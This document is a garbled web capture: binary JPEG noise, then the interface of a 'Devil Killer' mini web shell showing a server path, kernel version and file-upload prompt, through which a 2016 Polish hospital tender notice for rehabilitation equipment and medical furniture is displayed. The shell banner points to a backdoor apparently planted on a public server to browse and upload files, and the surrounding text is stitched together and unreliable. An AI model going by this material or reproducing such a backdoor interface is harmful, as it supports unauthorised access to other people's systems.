JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160705/119935-N-2016.html

<p class="kh_header"><b>Włodawa: zakup sprzętu rehabilitacyjnego, medycznego  i mebli medycznych 
w celu utworzenia DDOM w SPZOZ we Włodawie jako kontynuacja leczenia osób starszych niesamodzielnych poprzez realizację świadczeń opiekuńczo - leczniczych i rehabilitacyjnych w celu przywrócenia im sprawności i zdolności funkcjonowania w środowisku 
w ramach projektu Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014-2020.</b><br>
<b>Numer ogłoszenia: 119935 - 2016; data zamieszczenia: 05.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , Al. J. Piłsudskiego 64, 22-200 Włodawa, woj. lubelskie, tel. 082 5725817, faks 082 5724170.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup sprzętu rehabilitacyjnego, medycznego  i mebli medycznych 
w celu utworzenia DDOM w SPZOZ we Włodawie jako kontynuacja leczenia osób starszych niesamodzielnych poprzez realizację świadczeń opiekuńczo - leczniczych i rehabilitacyjnych w celu przywrócenia im sprawności i zdolności funkcjonowania w środowisku 
w ramach projektu Programu Operacyjnego Wiedza Edukacja Rozwój na lata 2014-2020..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 Diatermia krótkofalowa do terapii polem elektromagnetycznym wysokiej częstotliwości. Wyposażenie: 2 szt. aplikatorów gumowych; 6 szt. podkładów filcowych dla aplikatorów gumowych; 2 szt. osłon bawełnianych; 2 szt. Taśm elastycznych o wymiarach 122 cm do mocowania elektrod gumowych. Dokumenty: Instrukcja obsługi w języku polskim

Zadanie 2 Urządzenie do krioterapii
Urządzenie do krioterapii na ciekły azot ze zbiornikiem 30 l. Dane techniczne: czynnik roboczy ciekły azot  (LN2); max temperatura strumienia gazu: -160 st. C; 5 stopni regulacji intensywności nadmuchu; jeden zbiornik ciekłego azotu powinien starczyć na ok. 65 zabiegów po 3 min. Dokumenty: Instrukcja obsługi w języku polskim

Zadanie 3 Aparat do laseroterapii współpracujący z aplikatorami skanującymi i sondami punktowymi. Wyposażenie: przewód sieciowy; wtyk łącznika zdalnej blokady; okulary ochronne szt. 2 ; etykiety ostrzegawcze; sonda punktowa IR808nm/400mW; uchwyt do sondy punktowej. Dokumenty: instrukcja użytkowania, 

Zadanie 4 Dwukanałowy aparat do elektroterapii. 
Wyposażenie: przewód sieciowy, kable pacjenta 2 szt.; elektrody do elektroterapii 6 x 6cm 4 szt,  7,5 x 9 cm  2 szt; pasy rzepowe 40  x 10 cm  2 szt.,  100 x 10 cm   2 szt., pokrowce  do elektrod, zapasowe bezpieczniki.  Dokumenty: Instrukcja obsługi w języku polskim.

Zadanie 5 Lampa solux
Lampa solux wyposażona w mikroprocesorowy sterownik z zegarem zabiegowym i regulacją natężenia promieniowania. Wyposażenie: przwód sieciowy 1 szt., promiennik 375W 1 szt., filtr czerwony 1 szt., filtr niebieski 1 szt., okulary ochronne dla pacjenta 1 szt., okulary ochronne dla terapeuty 1 szt. Dokumenty: instrukcja użytkowania,

Zadanie 6 Kabina do ćwiczeń UGUL z osprzętem
Kabina do ćwiczeń UGUL z osprzętem.
                                                                                         
Zadanie 7 Drabinka rehabilitacyjna  
o wymiarach 90 x 220 cm, boki drabinki wykonane ze sklejki sosnowej, szczeble z pełnego drewna bukowego, wszystkie szczeble w jednakowym ułożeniu, całość malowana ekologicznym lakierem bezbarwnym.

Zadanie 8 Taśmy, piłki 
Komplet 3 szt. Taśm mniejszego oporu o długości 1,5 m, kolory żółty, czerwony, zielony.
Piłki gimnastyczne: fi 65 cm, maksymalne obciążenie 120 kg - 1 szt. ; fi 75 cm, maksymalne obciążenie 120 kg - 1 szt. 

Zadanie 9 Rotory 
Rotor do ćwiczeń kończyn górnych. 
Rotor do ćwiczeń kończyn dolnych - rower treningowy. 

Zadanie 10   stoły
Stół do masażu z ręczną zmianą wysokości,  7-segmentowy przeznaczony do masaży suchych. 
Stół rehabilitacyjny  składający się z dwóch segmentów.

Zadanie 11
Aparat EKG 12-kanałowy z oprzyrządowaniem, mobilny.                                                                                                    
W skład zestawu wchodzi elektrokardiograf, wózek medyczny oraz laserowa drukarka zewnętrzna umożliwiająca wydruk w formacie A4. 				

Zadanie 12 
Defibrylator + zestaw do reanimacji wraz z torbą transportową, elektrodami wielofunkcyjnymi i 10 szt. Baterii.                                                                                                                                                                                           
Zadanie 13 Meble medyczne  
1. Krzesło obrotowe kąpielowe - prysznicowe. 
2.  Przyłóżkowa szafka medyczna 2 szt. 
3. Szafa medyczna wykonana z blachy, drzwi przeszklone, półki ze szkła przestawne co 25mm, drzwi zamykane na klucz z zamkiem ryglujący w dwóch punktach. 
4. Leżanka trzyczęściowa z uchwytem na prześcieradło szt. 3 
5. Stojak na kroplówkę na kółkach, 
6. Krzesło zmywalne szt. 25. 
7. Fotel obrotowy z podłokietnikiem szt. 1 ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6, 33.12.32.00-0, 33.18.21.00-0, 33.19.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aktualny dokument potwierdzający, że zaoferowany przedmiot zamówienia jest   dopuszczony do obrotu i używania na terenie Polski zgodnie z obowiązującymi  przepisami prawa.
 Foldery informacyjne dotyczące oferowanego sprzętu ( opis, parametry, zdjęcie)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy. 
Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.wlodawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej, 22-200 Włodawa, al. J. Piłsudskiego 64, budynek administracji pokój 109..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2016 godzina 11:00, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej, 22-200 Włodawa, al. J. Piłsudskiego 64, budynek administracji - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Wiedza Edukacja Rozwój na lata 2014 - 2020  w ramach Osi priorytetowej V. Wsparcie dla obszaru zdrowia. Numer i nazwa Dzioałania: 5.2 Działania projakościowe i rozwiązania organizacyjne w systemie ochrony zdrowia ułatwiające dostęp do niedrogich, trwałych oraz wysokiej jakości usług zdrowotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Diatermia krótkofalowa do terapii polem elektromagnetycznym wysokiej częstotliwości; możliwość pracy w trybie ciągłym lub impulsywnym;  czytelny panel sterujący; identyfikacja podłączonych elektrod; akustyczny sygnał  zakończenia terapii. Dane techniczne :  generowana częstotliwość  27,12 MHz; rodzaj emisji ciągła, pulsacyjna; moc przy emisji ciągłej od 0 do 100 W; moc przy emisji pulsacyjnej od 0 do 200 W; częstotliwość pracy pulsacyjnej 10Hz, 20Hz, 50Hz, 100Hz, 400Hz ; Czas trwania impulsu 65 ?s, 100 ?s, 200 ?s, 300 ?s, 400 ?s; zegar czasu ekspozycji od 1 do 30 minut.  Wyposażenie: 2 szt. aplikatorów gumowych o wym. 12 x 18 cm; 6 szt. podkładów filcowych dla aplikatorów gumowych; 2 szt. osłon bawełnianych; 2 szt. Taśm elastycznych o wymiarach 122 cm do mocowania elektrod gumowych. Dokumenty: Instrukcja obsługi w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie do krioterapii na ciekły azot ze zbiornikiem 30 l. Dane techniczne: czynnik roboczy ciekły azot  (LN2); max temperatura strumienia gazu: -160 st. C; 5 stopni regulacji intensywności nadmuchu; jeden zbiornik ciekłego azotu powinien starczyć na ok. 65 zabiegów po 3 min. Dokumenty: Instrukcja obsługi w języku polskim.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do laseroterapii współpracujący z aplikatorami skanującymi i sondami punktowymi; moc sond i aplikatorów regulowana; tryb emisji: ciągły i impulsowy; regulacja wypełnienia lub czasu impulsu; tryb pracy programowy/manualny; duży czytelny wyświetlacz; obsługa w trybie graficznym;  system informacji kontekstowy; możliwość automatycznego powtórzenia zabiegu; edycja nazw programów przez użytkownika; wyświetlacz graficzny; licznik czasu pracy sond laserowych; stabilizacja i regulacja mocy sond. Dane techniczne: regulacja mocy 25-100%; tryb pracy źródeł ciągła impulsowa; zakres częstotliwości od 1 do 5000Hz; wypełnienie od25 do 75%, impuls 50us; ilość programów zabiegowych 50; ilość sekwencji zabiegowych10; ilość sekwencji skanera 25; lokacje pamięci dla programów uż. 20; zegar zabiegowy  max 99:59 min, krok 1s; zasilanie 230V, 50Hz, 40W. Wyposażenie: przewód sieciowy; wtyk łącznika zdalnej blokady; okulary ochronne szt. 2 ; etykiety ostrzegawcze; sonda punktowa IR808nm/400mW; uchwyt do sondy punktowej. Dokumenty: instrukcja użytkowania,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dwukanałowy aparat do elektroterapii.  Elektroterapia ,  prądy: interferencyjne (izoplanarny, dynamiczny, statyczny, jednokanałowy AMF); TENS (symetryczny, asymetryczny; naprzemienny, Burst); TENS do terapii porażeń spastycznych; Kotz a / rosyjska stymulacja ; tonoliza; diadynamiczne (MF, DF, CP, CP-ISO, LP); impulsowe (prostokątny, trójkątny) ; impulsowe wg Traberta, Leduca, neofaradyczny; unipolarne falujące; galwaniczne; mikroprądy. Elektrodiagnostyka: elektrodiagnostyka z graficzną prezentacją krzywej I / t; automatyczne wyliczanie reobazy, chronaksji, współczynnika akomodacji. Wyposażenie: przewód sieciowy, kable pacjenta 2 szt.; elektrody do elektroterapii 6 x 6cm 4 szt,  7,5 x 9 cm  2 szt; pasy rzepowe 40  x 10 cm  2 szt.,  100 x 10 cm   2 szt. , pokrowce  do elektrod, zapasowe bezpieczniki.  Dokumenty: Instrukcja obsługi w języku polskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampa solux wyposażona w mikroprocesorowy sterownik z zegarem zabiegowym i regulacją natężenia promieniowania, promieniowanie podczerwone IR-A, stabilna konstrukcja mechaniczna, trwała i niezawodna klawiatura, mikroprocesorowe sterowanie praca, lampy, wymuszone chłodzenie tubusa, siatka zabezpieczające. Funkcjonalność: zegar zabiegowy; filtry czerwony i niebieski; regulacja jasności świecenia; wyświetlacz jasność/ czas; programowanie sekwencji jasność/czas. Parametry techniczne: maksymalna moc żarówki 375 W, regulacja jasności 10 - 100%, krok 10 %, zegar zabiegowy 1 - 30 min. Wyposażenie: przwód sieciowy 1 szt., promiennik 375W 1 szt., filtr czerwony 1 szt., filtr niebieski 1 szt., okulary ochronne dla pacjenta 1 szt., okulary ochronne dla terapeuty 1 szt. Dokumenty: instrukcja użytkowania,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kabina do ćwiczeń UGUL z osprzętem. Konstrukcja stalowa, malowana farbą proszkową, wymiary 200 x 198 x 200 lub 200 x 200 x 200.                                                                                             
Osprzęt:                                                                                                                                                     - linka do podwieszeń i ćwiczeń w obciążeniu dł. 1600 mm - 8 szt.
linka do podwieszeń i ćwiczeń w obciążeniu dł. 960 mm - 2 szt.
Linka do ćwiczeń wspomaganych dł. 2450 mm - 1 szt.
Linka do ćwiczeń z obciążeniem dł. 3750 mm - 2 szt.
Podwieszka przedramion i podudzi 100 x 420mm - 2 szt.
Podwieszka ud i ramion  145 x 540 mm - 2 szt.
Podwieszka pod miednicę 230 x 750 mm - 1 szt.
Podwieszka klatki piersiowej  230 x 700/ 100 mm - 1 szt.
Podwieszka pod głowę 170 x 540 mm - 1 szt.
Podwieszka stóp 75 x 570 mm - 2 szt.
Podwieszka dwustawowa  ze skóry  - 2 szt.
Pas do wyciągu za miednicę ,uniwersalny - 1 szt.
Kamaszek ze skóry - 1 szt.
Ciężarek miękki  0,5 kg - 2 szt.
Ciężarek miękki  1 kg - 2 szt.
Ciężarek miękki  1,5 kg - 1 szt.
Ciężarek miękki  2,0 kg - 1 szt.
Ciężarek miękki  2,5 kg - 1 szt.
Ciężarek miękki  3,5 kg - 1 szt.
Esik - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin realizacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> sprzęt rehabilitacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drabinka rehabilitacyjna  
o wymiarach 90 x 220 cm, boki drabinki wykonane ze sklejki sosnowej, szczeble z pełnego drewna bukowego, wszystkie szczeble w jednakowym ułożeniu, całość malowana ekologicznym lakierem bezbarwnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.00.00-6.</p></li>
